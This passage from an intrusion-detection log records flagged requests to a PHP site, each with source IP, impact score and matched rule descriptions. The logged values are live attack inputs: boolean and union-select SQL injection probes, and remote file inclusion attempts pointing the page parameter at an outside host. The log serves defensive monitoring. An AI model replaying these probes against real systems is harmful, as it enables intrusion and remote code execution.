Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122024
Name:GET.page
Value:oldnews and 0=1 union select
Page:/i.php?page=oldnews+and+0=1+union+select+
IP:213.67.242.41
Impact:20
Created:2010-04-21 02:30:09
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122021
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:213.67.242.41
Impact:20
Created:2010-04-21 02:29:15
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122022
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:213.67.242.41
Impact:20
Created:2010-04-21 02:29:15
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122019
Name:REQUEST.page
Value:security/mutillidae-deliberate …/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberate%20%E2%80%A6/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-21 00:04:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122020
Name:GET.page
Value:security/mutillidae-deliberate …/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberate%20%E2%80%A6/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-21 00:04:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122015
Name:REQUEST.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-21 00:03:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122016
Name:REQUEST.page
Value:security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-21 00:03:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122017
Name:GET.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-21 00:03:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122018
Name:GET.page
Value:security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-21 00:03:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122011
Name:REQUEST.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-20 23:57:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122012
Name:REQUEST.page
Value:security/mutillidae-deliberate …/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberate%20%E2%80%A6/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-20 23:57:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122013
Name:GET.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-20 23:57:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122014
Name:GET.page
Value:security/mutillidae-deliberate …/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberate%20%E2%80%A6/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-20 23:57:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122009
Name:REQUEST.page
Value:security/?page=security/cachecrack'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/cachecrack%27/**/XoR/**/%278%27%3D%278
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:01:09
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122010
Name:GET.page
Value:security/?page=security/cachecrack'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/cachecrack%27/**/XoR/**/%278%27%3D%278
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:01:09
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122007
Name:REQUEST.page
Value:security/?page=security/cachecrack'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/cachecrack%27/**/XoR/**/%278%27%3D%273
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:01:08
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122008
Name:GET.page
Value:security/?page=security/cachecrack'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/cachecrack%27/**/XoR/**/%278%27%3D%273
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:01:08
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122005
Name:REQUEST.page
Value:security/?page=security/cachecrack' XoR '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%09XoR%09%278%27%3D%278
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:01:06
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122006
Name:GET.page
Value:security/?page=security/cachecrack' XoR '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%09XoR%09%278%27%3D%278
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:01:06
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122003
Name:REQUEST.page
Value:security/?page=security/cachecrack' XoR '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%09XoR%09%278%27%3D%273
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:01:05
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122004
Name:GET.page
Value:security/?page=security/cachecrack' XoR '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%09XoR%09%278%27%3D%273
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:01:05
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122001
Name:REQUEST.page
Value:security/?page=security/cachecrack' XoR '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%20XoR%20%278%27%3D%278
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:00:57
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122002
Name:GET.page
Value:security/?page=security/cachecrack' XoR '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%20XoR%20%278%27%3D%278
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:00:57
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121999
Name:REQUEST.page
Value:security/?page=security/cachecrack' XoR '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%20XoR%20%278%27%3D%273
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:00:56
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122000
Name:GET.page
Value:security/?page=security/cachecrack' XoR '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%20XoR%20%278%27%3D%273
IP:60.4.48.2
Impact:38
Created:2010-04-20 22:00:56
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121997
Name:REQUEST.page
Value:security/?page=security/cachecrack/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/cachecrack/**/XoR/**/8%3D8
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:54
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121998
Name:GET.page
Value:security/?page=security/cachecrack/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/cachecrack/**/XoR/**/8%3D8
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:54
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121995
Name:REQUEST.page
Value:security/?page=security/cachecrack/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/cachecrack/**/XoR/**/8%3D3
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:52
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121996
Name:GET.page
Value:security/?page=security/cachecrack/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/cachecrack/**/XoR/**/8%3D3
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:52
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121993
Name:REQUEST.page
Value:security/?page=security/cachecrack%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/cachecrack%25%27/**/aND/**/%278%25%27%3D%273
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:39
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121994
Name:GET.page
Value:security/?page=security/cachecrack%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/cachecrack%25%27/**/aND/**/%278%25%27%3D%273
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:39
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121991
Name:REQUEST.page
Value:security/?page=security/cachecrack%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/cachecrack%25%27/**/aND/**/%278%27%3D%278
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:38
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121992
Name:GET.page
Value:security/?page=security/cachecrack%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/cachecrack%25%27/**/aND/**/%278%27%3D%278
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:38
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121989
Name:REQUEST.page
Value:security/?page=security/cachecrack%' aND '8%'='3
Page:/i.php?page=security/?page=security/cachecrack%25%27%09aND%09%278%25%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:37
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121990
Name:GET.page
Value:security/?page=security/cachecrack%' aND '8%'='3
Page:/i.php?page=security/?page=security/cachecrack%25%27%09aND%09%278%25%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:37
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121987
Name:REQUEST.page
Value:security/?page=security/cachecrack%' aND '8'='8
Page:/i.php?page=security/?page=security/cachecrack%25%27%09aND%09%278%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:36
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121988
Name:GET.page
Value:security/?page=security/cachecrack%' aND '8'='8
Page:/i.php?page=security/?page=security/cachecrack%25%27%09aND%09%278%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:36
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121985
Name:REQUEST.page
Value:security/?page=security/cachecrack%' aND '8%'='3
Page:/i.php?page=security/?page=security/cachecrack%25%27%20aND%20%278%25%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:34
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121986
Name:GET.page
Value:security/?page=security/cachecrack%' aND '8%'='3
Page:/i.php?page=security/?page=security/cachecrack%25%27%20aND%20%278%25%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:34
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121983
Name:REQUEST.page
Value:security/?page=security/cachecrack%' aND '8%'='8
Page:/i.php?page=security/?page=security/cachecrack%25%27%20aND%20%278%25%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:32
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121984
Name:GET.page
Value:security/?page=security/cachecrack%' aND '8%'='8
Page:/i.php?page=security/?page=security/cachecrack%25%27%20aND%20%278%25%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:32
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121981
Name:REQUEST.page
Value:security/?page=security/cachecrack'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/cachecrack%27/**/aND/**/%278%27%3D%273
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:26
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121982
Name:GET.page
Value:security/?page=security/cachecrack'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/cachecrack%27/**/aND/**/%278%27%3D%273
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:26
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121979
Name:REQUEST.page
Value:security/?page=security/cachecrack'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/cachecrack%27/**/aND/**/%278%27%3D%278
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:19
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121980
Name:GET.page
Value:security/?page=security/cachecrack'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/cachecrack%27/**/aND/**/%278%27%3D%278
IP:60.4.48.2
Impact:66
Created:2010-04-20 22:00:19
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121977
Name:REQUEST.page
Value:security/?page=security/cachecrack/**/aND/**/8=3
Page:/i.php?page=security/?page=security/cachecrack/**/aND/**/8%3D3
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:15
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121978
Name:GET.page
Value:security/?page=security/cachecrack/**/aND/**/8=3
Page:/i.php?page=security/?page=security/cachecrack/**/aND/**/8%3D3
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:15
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121975
Name:REQUEST.page
Value:security/?page=security/cachecrack/**/aND/**/8=8
Page:/i.php?page=security/?page=security/cachecrack/**/aND/**/8%3D8
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:13
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121976
Name:GET.page
Value:security/?page=security/cachecrack/**/aND/**/8=8
Page:/i.php?page=security/?page=security/cachecrack/**/aND/**/8%3D8
IP:60.4.48.2
Impact:6
Created:2010-04-20 22:00:13
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121973
Name:REQUEST.page
Value:security/?page=security/cachecrack' aND '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%09aND%09%278%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:11
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121974
Name:GET.page
Value:security/?page=security/cachecrack' aND '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%09aND%09%278%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:11
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121971
Name:REQUEST.page
Value:security/?page=security/cachecrack' aND '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%09aND%09%278%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:09
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121972
Name:GET.page
Value:security/?page=security/cachecrack' aND '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%09aND%09%278%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 22:00:09
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121969
Name:REQUEST.page
Value:security/?page=security/cachecrack' aND '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%20aND%20%278%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 21:59:58
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121970
Name:GET.page
Value:security/?page=security/cachecrack' aND '8'='3
Page:/i.php?page=security/?page=security/cachecrack%27%20aND%20%278%27%3D%273
IP:60.4.48.2
Impact:46
Created:2010-04-20 21:59:58
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121967
Name:REQUEST.page
Value:security/?page=security/cachecrack' aND '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%20aND%20%278%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 21:59:55
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
